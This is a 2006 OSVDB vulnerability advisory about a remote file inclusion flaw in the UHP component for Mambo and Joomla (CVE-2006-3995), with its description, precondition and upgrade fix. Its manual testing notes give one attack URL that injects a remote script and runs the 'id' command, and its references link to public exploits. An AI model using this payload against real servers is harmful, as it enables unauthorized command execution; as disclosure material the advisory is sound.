UHP for Mambo uhp_config.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-30T07:04:14
ID OSVDB:27651
Type osvdb
Reporter Kurdish Security()
Modified 2006-07-30T07:04:14

Description

Vulnerability Description

UHP for Mambo and Joomla contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uhp_config.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 0.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

UHP for Mambo and Joomla contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uhp_config.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=y0urscripts.txt?&cmd=id

References:

Vendor URL: http://www.ravenswoodit.co.uk/index.php?option=com_docman&task=cat_view&gid=76&Itemid=13 Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Secunia Advisory ID:21305 Related OSVDB ID: 28111 Related OSVDB ID: 28112 Related OSVDB ID: 27652 Related OSVDB ID: 28113 Mail List Post: http://attrition.org/pipermail/vim/2007-March/001457.html Keyword: User Home Pages (UHP) ISS X-Force ID: 28080 Generic Exploit URL: http://milw0rm.com/exploits/2089 Generic Exploit URL: http://milw0rm.com/exploits/3553 FrSIRT Advisory: ADV-2006-3056 CVE-2006-3995 Bugtraq ID: 19233